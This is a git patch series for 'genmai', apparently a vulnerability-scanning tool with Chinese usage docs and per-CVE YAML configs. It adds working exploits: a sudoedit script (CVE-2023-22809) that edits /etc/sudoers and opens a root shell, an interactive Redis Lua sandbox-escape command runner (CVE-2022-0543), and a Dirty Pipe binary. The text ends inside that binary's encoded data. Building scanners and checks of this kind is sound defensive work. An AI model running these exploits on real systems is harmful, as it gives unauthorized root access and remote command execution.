From b98f6d17620f5016c60faf51c2d9b3290b682b82 Mon Sep 17 00:00:00 2001
From: hankdamonlee <zy2039109@buaa.edu.cn>
Date: Wed, 8 Mar 2023 15:55:17 +0000
Subject: [PATCH 01/13] =?UTF-8?q?add=20docs/=E4=BD=BF=E7=94=A8=E6=96=87?=
 =?UTF-8?q?=E6=A1=A3.md.=20=E6=B7=BB=E5=8A=A0=E5=8F=AF=E5=9C=A8=E7=BA=BF?=
 =?UTF-8?q?=E9=A2=84=E8=A7=88=E7=9A=84=E4=BD=BF=E7=94=A8=E6=96=87=E6=A1=A3?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: hankdamonlee <zy2039109@buaa.edu.cn>
---
 docs/使用文档.md | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 docs/使用文档.md

diff --git a/docs/使用文档.md b/docs/使用文档.md
new file mode 100644
index 0000000..7809f29
--- /dev/null
+++ b/docs/使用文档.md
@@ -0,0 +1,31 @@
+genmai工具使用文档
+一．环境搭建：
+golang环境大于等于go1.17.2；
+python3环境大于等于3.8;
+进入src目录下终端导入golang需要引入的库，这里使用 ”go mod tidy” 进行导入库；
+进入src目录，使用pip3进行导入需要的python库，这里使用 “pip3 install -r requirements.txt”,若加载过慢可使用清华源加载（pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple ）;
+
+二．Kernel模块
+kernel模块为genmai中内核漏洞检测模块。在环境搭建好后使用 ”go run main.go -kernel=all”就可以使用poc/exp检测内核模块是否存在漏洞。因为内核漏洞会引起系统崩溃，所以这里我们默认poc/exp为低破坏性的，具有破坏性通过匹配内核版本，需人工手动执行exp。
+我们也可以通过配置KernelPocs.yaml或KernelPocs.json文件来选择要执行哪些poc，当然我们这默认选择是yaml文件。
+ 
+三．System模块
+system模块为genami中系统漏洞检测模块，其检测通过去调度SystemPocs目录下的poc检测包括sudo提权、polkit提权、openssl等相关漏洞。
+这里使用 ”go run main.go -system=all”开始系统检测。
+我们也可以通过配置SystemPocs.yaml或SystemPocs.json文件来选择要执行哪些poc，当然我们这默认选择是yaml文件。
+ 
+四．Baseline模块
+BaseLine模块介绍及使用：
+baseline模块为genmai工具的基线检测模块，基线检查功能通过配置不同的基线检查策略，可以帮助您快速对服务器进行批量扫描，发现包括系统、账号权限、数据库、弱口令 、等级保护合规配置等存在的风险点。我们使用 ”go run main.go -baseline=all”开始进行基线检测。
+可以看出部分基线检测是需要高权限才能检测，这时我们可以配置data/BaseLine下的BaseLine.yaml文件中的RootPasswd，将root密码对应填入。接着 ”systemctl start ssh” 开启ssh。再次执行基线检测命令。
+
+五．插件模块
+1.	FastScan(系统漏洞版本匹配，快速扫描)
+FastScan是通过匹配版本号的方式，对系统进行快速扫描。这里我们使用了内部数据库，暂时还未准备将数据库公开。所以在扫描前需要输入数据库密码。
+配置完成后，我们使用 ”go run main.go -FastScan”就可以开始对系统进行快速扫描。 
+2.	Fofa(fofa获取资产信息)
+3.	Nmap(Nmap检测端口开放情况)
+4.	SSHExplosion(ssh快速爆破检测弱密码情况)
+5.	WeakPwdGeneration(弱密码生成器)
+
+六．POC/EXP/基线策略添加

From f1992202e8905bed2b49aa9409feb063118b0a7c Mon Sep 17 00:00:00 2001
From: hankdamonlee <zy2039109@buaa.edu.cn>
Date: Wed, 8 Mar 2023 15:55:33 +0000
Subject: [PATCH 02/13] =?UTF-8?q?update=20docs/=E4=BD=BF=E7=94=A8=E6=96=87?=
 =?UTF-8?q?=E6=A1=A3.md.?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: hankdamonlee <zy2039109@buaa.edu.cn>
---
 docs/使用文档.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/docs/使用文档.md b/docs/使用文档.md
index 7809f29..4616ca7 100644
--- a/docs/使用文档.md
+++ b/docs/使用文档.md
@@ -1,4 +1,6 @@
 genmai工具使用文档
+
+
 一．环境搭建：
 golang环境大于等于go1.17.2；
 python3环境大于等于3.8;

From b88ed7ced2b371c14e65b9455cd4385712a2e5e1 Mon Sep 17 00:00:00 2001
From: hankdamonlee <zy2039109@buaa.edu.cn>
Date: Wed, 8 Mar 2023 15:57:13 +0000
Subject: [PATCH 03/13] =?UTF-8?q?update=20docs/=E4=BD=BF=E7=94=A8=E6=96=87?=
 =?UTF-8?q?=E6=A1=A3.md.?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: hankdamonlee <zy2039109@buaa.edu.cn>
---
 docs/使用文档.md | 37 ++++++++++++++++++-------------------
 1 file changed, 18 insertions(+), 19 deletions(-)

diff --git a/docs/使用文档.md b/docs/使用文档.md
index 4616ca7..768fa52 100644
--- a/docs/使用文档.md
+++ b/docs/使用文档.md
@@ -1,30 +1,29 @@
 genmai工具使用文档
 
 
-一．环境搭建：
-golang环境大于等于go1.17.2；
-python3环境大于等于3.8;
-进入src目录下终端导入golang需要引入的库，这里使用 ”go mod tidy” 进行导入库；
-进入src目录，使用pip3进行导入需要的python库，这里使用 “pip3 install -r requirements.txt”,若加载过慢可使用清华源加载（pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple ）;
+一. 环境搭建：
+- golang环境大于等于go1.17.2；
+- python3环境大于等于3.8;
+- 进入src目录下终端导入golang需要引入的库，这里使用 ”go mod tidy” 进行导入库；
+- 进入src目录，使用pip3进行导入需要的python库，这里使用 “pip3 install -r requirements.txt”,若加载过慢可使用清华源加载（pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple ）;
 
-二．Kernel模块
-kernel模块为genmai中内核漏洞检测模块。在环境搭建好后使用 ”go run main.go -kernel=all”就可以使用poc/exp检测内核模块是否存在漏洞。因为内核漏洞会引起系统崩溃，所以这里我们默认poc/exp为低破坏性的，具有破坏性通过匹配内核版本，需人工手动执行exp。
-我们也可以通过配置KernelPocs.yaml或KernelPocs.json文件来选择要执行哪些poc，当然我们这默认选择是yaml文件。
+二. Kernel模块
+- kernel模块为genmai中内核漏洞检测模块。在环境搭建好后使用 ”go run main.go -kernel=all”就可以使用poc/exp检测内核模块是否存在漏洞。因为内核漏洞会引起系统崩溃，所以这里我们默认poc/exp为低破坏性的，具有破坏性通过匹配内核版本，需人工手动执行exp。
+- 我们也可以通过配置KernelPocs.yaml或KernelPocs.json文件来选择要执行哪些poc，当然我们这默认选择是yaml文件。
  
-三．System模块
-system模块为genami中系统漏洞检测模块，其检测通过去调度SystemPocs目录下的poc检测包括sudo提权、polkit提权、openssl等相关漏洞。
-这里使用 ”go run main.go -system=all”开始系统检测。
-我们也可以通过配置SystemPocs.yaml或SystemPocs.json文件来选择要执行哪些poc，当然我们这默认选择是yaml文件。
+三. System模块
+- system模块为genami中系统漏洞检测模块，其检测通过去调度SystemPocs目录下的poc检测包括sudo提权、polkit提权、openssl等相关漏洞。
+- 这里使用 ”go run main.go -system=all”开始系统检测。
+- 我们也可以通过配置SystemPocs.yaml或SystemPocs.json文件来选择要执行哪些poc，当然我们这默认选择是yaml文件。
  
-四．Baseline模块
-BaseLine模块介绍及使用：
-baseline模块为genmai工具的基线检测模块，基线检查功能通过配置不同的基线检查策略，可以帮助您快速对服务器进行批量扫描，发现包括系统、账号权限、数据库、弱口令 、等级保护合规配置等存在的风险点。我们使用 ”go run main.go -baseline=all”开始进行基线检测。
-可以看出部分基线检测是需要高权限才能检测，这时我们可以配置data/BaseLine下的BaseLine.yaml文件中的RootPasswd，将root密码对应填入。接着 ”systemctl start ssh” 开启ssh。再次执行基线检测命令。
+四. Baseline模块
+- BaseLine模块介绍及使用：
+- baseline模块为genmai工具的基线检测模块，基线检查功能通过配置不同的基线检查策略，可以帮助您快速对服务器进行批量扫描，发现包括系统、账号权限、数据库、弱口令 、等级保护合规配置等存在的风险点。我们使用 ”go run main.go -baseline=all”开始进行基线检测。
+- 可以看出部分基线检测是需要高权限才能检测，这时我们可以配置data/BaseLine下的BaseLine.yaml文件中的RootPasswd，将root密码对应填入。接着 ”systemctl start ssh” 开启ssh。再次执行基线检测命令。
 
-五．插件模块
+五. 插件模块
 1.	FastScan(系统漏洞版本匹配，快速扫描)
-FastScan是通过匹配版本号的方式，对系统进行快速扫描。这里我们使用了内部数据库，暂时还未准备将数据库公开。所以在扫描前需要输入数据库密码。
-配置完成后，我们使用 ”go run main.go -FastScan”就可以开始对系统进行快速扫描。 
+> FastScan是通过匹配版本号的方式，对系统进行快速扫描。这里我们使用了内部数据库，暂时还未准备将数据库公开。所以在扫描前需要输入数据库密码。配置完成后，我们使用 ”go run main.go -FastScan”就可以开始对系统进行快速扫描。 
 2.	Fofa(fofa获取资产信息)
 3.	Nmap(Nmap检测端口开放情况)
 4.	SSHExplosion(ssh快速爆破检测弱密码情况)

From 692cf38b4e6c2490a7bcbdb7e327a4b8a0bc21a7 Mon Sep 17 00:00:00 2001
From: t1an5t <tianstcht@buaa.edu.cn>
Date: Wed, 8 Mar 2023 08:33:43 +0000
Subject: [PATCH 04/13] update
 data/SystemPocs/CVE-2021-3156/CVE-2021-3156.yaml.

Signed-off-by: t1an5t <tianstcht@buaa.edu.cn>
---
 data/SystemPocs/CVE-2021-3156/CVE-2021-3156.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/data/SystemPocs/CVE-2021-3156/CVE-2021-3156.yaml b/data/SystemPocs/CVE-2021-3156/CVE-2021-3156.yaml
index 67cb098..0a19351 100644
--- a/data/SystemPocs/CVE-2021-3156/CVE-2021-3156.yaml
+++ b/data/SystemPocs/CVE-2021-3156/CVE-2021-3156.yaml
@@ -4,7 +4,7 @@ Belong: system
 PocHazardLevel: low
 Source: https://github.com/worawit/CVE-2021-3156
 SiteInfo:
-    Name: Polkit（PolicyKit）是类Unix系统中一个应用程序级别的工具集，通过定义和审核权限规则，实现不同优先级进程间的通讯。pkexec是Polkit开源应用框架的一部分，可以使授权非特权用户根据定义的策略以特权用户的身份执行命令。
+    Name: Sudo 是一个用于类 Unix 计算机操作系统的程序，它能够使用户能够以另一个用户（默认是超级用户）的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。
     Severity: high
     Description:
         Sudo before 1.9.5p2 存在缓冲区错误漏洞，攻击者可使用sudoedit -s和一个以单个反斜杠字符结束的命令行参数升级到root。

From 0dfc6e09595c14cc88240ca80fdb17d5b86dda7d Mon Sep 17 00:00:00 2001
From: pil10w <sy2039105@buaa.edu.cn>
Date: Wed, 8 Mar 2023 17:28:30 +0800
Subject: [PATCH 05/13] Add CVE-2023-22809 check script

---
 .../CVE-2023-22809/CVE-2023-22809.sh          | 41 +++++++++++++++++
 .../CVE-2023-22809/CVE-2023-22809.yaml        | 45 +++++++++++++++++++
 2 files changed, 86 insertions(+)
 create mode 100644 data/SystemPocs/CVE-2023-22809/CVE-2023-22809.sh
 create mode 100644 data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml

diff --git a/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.sh b/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.sh
new file mode 100644
index 0000000..e260f70
--- /dev/null
+++ b/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.sh
@@ -0,0 +1,41 @@
+#!/usr/bin/env bash
+#
+# Exploit Title: sudo 1.8.0 - 1.9.12p1 - Privilege Escalation
+# 
+# Exploit Author: n3m1.sys
+# CVE: CVE-2023-22809
+# Date: 2023/01/21
+# Vendor Homepage: https://www.sudo.ws/
+# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz
+# Version: 1.8.0 to 1.9.12p1
+# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9
+#
+# Running this exploit on a vulnerable system allows a localiattacker to gain 
+# a root shell on the machine.
+#
+# The exploit checks if the current user has privileges to run sudoedit or 
+# sudo -e on a file as root. If so it will open the sudoers file for the
+# attacker to add a line to gain privileges on all the files and get a root 
+# shell.
+
+if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
+then
+    echo "> Currently installed sudo version is not vulnerable"
+    exit 1
+fi
+
+EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)
+
+if [ -z "$EXPLOITABLE" ]; then
+    echo "> It doesn't seem that this user can run sudoedit as root"
+    read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
+else
+    echo "> BINGO! User exploitable"
+fi
+
+echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
+echo "$USER ALL=(ALL:ALL) ALL"
+read -n 1 -s -r -p "Press any key to continue..."
+EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
+sudo su root
+exit 0
diff --git a/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml b/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml
new file mode 100644
index 0000000..6ecddd1
--- /dev/null
+++ b/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml
@@ -0,0 +1,45 @@
+FormatVer: 20230308
+Id: CVE-2023-22809
+Belong: system
+PocHazardLevel: low
+Source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc
+SiteInfo:
+    Name: Sudo 是一个用于类 Unix 计算机操作系统的程序，它能够使用户能够以另一个用户（默认是超级用户）的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。
+    Severity: high
+    Description:
+        Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞，漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤，导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。
+    ScopeOfInfluence:
+        sudo@[1.8.0, 1.9.12p2)
+    References:
+        - https://nvd.nist.gov/vuln/detail/CVE-2023-22809
+    SiteClassification:
+        CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+        CvssScore: 7.8
+        CveId: CVE-2023-22809
+        CweId: CWE-269
+        CnvdId: None
+        KveId: None
+    Tags:
+        - 特权管理不当
+SiteRequests:
+    Implement: 
+        ImArray:
+            - Inter : bash
+              InterArgs :
+              Exec : CVE-2023-22809.sh
+              Args : 
+        ExpireTime:       #second
+
+        # < input
+        # > output 
+        # . wait
+        # ? condition
+        # : content
+        #
+        #组合起来
+        # >. 等待直到输出 
+        # << 输入字符
+        # >?判断条件
+        Inter:
+            - ">?:BINGO! User exploitable" #ture
+        Condition: None

From 92c5af3d81b0d62a654fa28649f609f1085344aa Mon Sep 17 00:00:00 2001
From: yangjipeng <yangjipeng@kylinos.cn>
Date: Thu, 9 Mar 2023 09:28:29 +0800
Subject: [PATCH 06/13] Update CVE-2023-22809 judge method.

---
 data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml b/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml
index 6ecddd1..9bd5068 100644
--- a/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml
+++ b/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml
@@ -41,5 +41,7 @@ SiteRequests:
         # << 输入字符
         # >?判断条件
         Inter:
-            - ">?:BINGO! User exploitable" #ture
+            - "<<:whoami\n" #ture
+            - ">.:\n"
+            - ">?:root"
         Condition: None

From 2d35b06f35d858cfc1533c355c81aa1b68ab7150 Mon Sep 17 00:00:00 2001
From: xuwenhan <xuwenhan@buaa.edu.cn>
Date: Wed, 8 Mar 2023 20:30:50 +0800
Subject: [PATCH 07/13] add CVE-2022-0543

---
 .../SystemPocs/CVE-2022-0543/CVE-2022-0543.py | 30 +++++++++++
 .../CVE-2022-0543/CVE-2022-0543.yaml          | 53 +++++++++++++++++++
 2 files changed, 83 insertions(+)
 create mode 100644 data/SystemPocs/CVE-2022-0543/CVE-2022-0543.py
 create mode 100644 data/SystemPocs/CVE-2022-0543/CVE-2022-0543.yaml

diff --git a/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.py b/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.py
new file mode 100644
index 0000000..571116f
--- /dev/null
+++ b/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.py
@@ -0,0 +1,30 @@
+import redis
+import sys
+
+def echoMessage():
+	version = """  
+      [#] Create By ::
+        _                     _    ___   __   ____                             
+       / \   _ __   __ _  ___| |  / _ \ / _| |  _ \  ___ _ __ ___   ___  _ __  
+      / _ \ | '_ \ / _` |/ _ \ | | | | | |_  | | | |/ _ \ '_ ` _ \ / _ \| '_ \ 
+     / ___ \| | | | (_| |  __/ | | |_| |  _| | |_| |  __/ | | | | | (_) | | | |
+    /_/   \_\_| |_|\__, |\___|_|  \___/|_|   |____/ \___|_| |_| |_|\___/|_| |_|
+                   |___/            By https://aodsec.com                                           
+    """
+	print(version)
+
+def shell(ip,port,cmd):
+	lua= 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("'+cmd+'", "r"); local res = f:read("*a"); f:close(); return res'
+	r  =  redis.Redis(host = ip,port = port)
+	script = r.eval(lua,0)
+	print(script)
+
+if __name__ == '__main__':
+	echoMessage()
+	ip = "127.0.0.1"
+	port = "6379"
+	while True:
+		cmd = input("input exec cmd:(q->exit)\n>>")
+		if cmd == "q" or cmd == "exit":
+			sys.exit()
+		shell(ip,port,cmd)
diff --git a/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.yaml b/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.yaml
new file mode 100644
index 0000000..ab442bd
--- /dev/null
+++ b/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.yaml
@@ -0,0 +1,53 @@
+FormatVer: 20230306
+Id: CVE-2022-0543
+Belong: system
+PocHazardLevel: low
+Source: https://github.com/aodsec/CVE-2022-0543
+SiteInfo:
+    Name: Redis是著名的开源Key-Value数据库，其具备在沙箱中执行Lua脚本的能力。
+    Severity: critical
+    Description:
+        Debian 以及 Ubuntu 发行版的源在打包 Redis 时，不慎在 Lua 沙箱中遗留了一个对象package，攻击者可以利用这个对象提供的方法加载动态链接库 liblua 里的函数，进而逃逸沙箱执行任意命令。我们借助 Lua 沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在 Lua 中执行这个导出函数，即可获得io库，再使用其执行命令。
+    ScopeOfInfluence:
+        2.2 <= redis < 5.0.13
+        2.2 <= redis < 6.0.15
+        2.2 <= redis < 6.2.5
+    References:
+      - http://packetstormsecurity.com/files/166885/Redis-Lua-Sandbox-Escape.html
+      - https://nvd.nist.gov/vuln/detail/CVE-2022-0543
+    SiteClassification:
+        CvssMetrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+        CvssScore: 10.0
+        CveId: CVE-2022-0543
+        CweId: None
+        CnvdId: None
+        KveId: None
+    Tags:
+        - cve2022
+        - redis
+        - RCE
+SiteRequests:
+    Implement: 
+        ImArray:
+            - Inter : python3
+              InterArgs :
+              Exec : CVE-2022-0543.py
+              Args : 
+        ExpireTime:       #second
+
+        # < input
+        # > output 
+        # . wait
+        # ? condition
+        # : content
+        #
+        #组合起来
+        # >. 等待直到输出 
+        # << 输入字符
+        # >?判断条件
+        Inter:
+            - ">.:>>"  #ture
+            - "<<:whoami\n"
+            - ">.:\n"      #等待输出'\n'
+            - ">?:root" 
+        Condition: None
\ No newline at end of file

From 9543c11f7ff42116e7838991b62874fa5e963be3 Mon Sep 17 00:00:00 2001
From: yangjipeng <yangjipeng@kylinos.cn>
Date: Thu, 9 Mar 2023 09:56:56 +0800
Subject: [PATCH 08/13] Update Systempoc main yaml.

---
 data/SystemPocs/SystemPocs.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/data/SystemPocs/SystemPocs.yaml b/data/SystemPocs/SystemPocs.yaml
index cb68ec7..66408bf 100644
--- a/data/SystemPocs/SystemPocs.yaml
+++ b/data/SystemPocs/SystemPocs.yaml
@@ -11,4 +11,5 @@ ExplorerItems:
     - ConfigFile: CVE-2021-3560/CVE-2021-3560.yaml
     - ConfigFile: CVE-2021-4043/CVE-2021-4043.yaml
     - ConfigFile: CVE-2021-3156/CVE-2021-3156.yaml
-    - ConfigFile: CVE-2022-0351/CVE-2022-0351.yaml
\ No newline at end of file
+    - ConfigFile: CVE-2022-0351/CVE-2022-0351.yaml
+    - ConfigFile: CVE-2023-22809/CVE-2023-22809.yaml
\ No newline at end of file

From e1303018478fbdee5f6ef5026c4ff5639f122c98 Mon Sep 17 00:00:00 2001
From: Amon_S1eepy <12577316+amon-s1eepy@user.noreply.gitee.com>
Date: Wed, 8 Mar 2023 23:54:44 +0000
Subject: [PATCH 09/13] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-0847?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 data/KernelPocs/CVE-2022-0847/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 data/KernelPocs/CVE-2022-0847/.keep

diff --git a/data/KernelPocs/CVE-2022-0847/.keep b/data/KernelPocs/CVE-2022-0847/.keep
new file mode 100644
index 0000000..e69de29

From c71baa94c9eec3234a4cf146a3f2a538bedad054 Mon Sep 17 00:00:00 2001
From: Amon_S1eepy <12577316+amon-s1eepy@user.noreply.gitee.com>
Date: Thu, 9 Mar 2023 00:01:22 +0000
Subject: [PATCH 10/13] add files

Signed-off-by: Amon_S1eepy <12577316+amon-s1eepy@user.noreply.gitee.com>
---
 data/KernelPocs/CVE-2022-0847/CVE-2022-0847   | Bin 0 -> 13328 bytes
 data/KernelPocs/CVE-2022-0847/CVE-2022-0847.c | 179 ++++++++++++++++++
 .../CVE-2022-0847/CVE-2022-0847.yaml          |  38 ++++
 3 files changed, 217 insertions(+)
 create mode 100644 data/KernelPocs/CVE-2022-0847/CVE-2022-0847
 create mode 100644 data/KernelPocs/CVE-2022-0847/CVE-2022-0847.c
 create mode 100644 data/KernelPocs/CVE-2022-0847/CVE-2022-0847.yaml

diff --git a/data/KernelPocs/CVE-2022-0847/CVE-2022-0847 b/data/KernelPocs/CVE-2022-0847/CVE-2022-0847
new file mode 100644
index 0000000000000000000000000000000000000000..4c6bbdd3d126b770e71cdc8f78670ba132ad4407
GIT binary patch
literal 13328
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
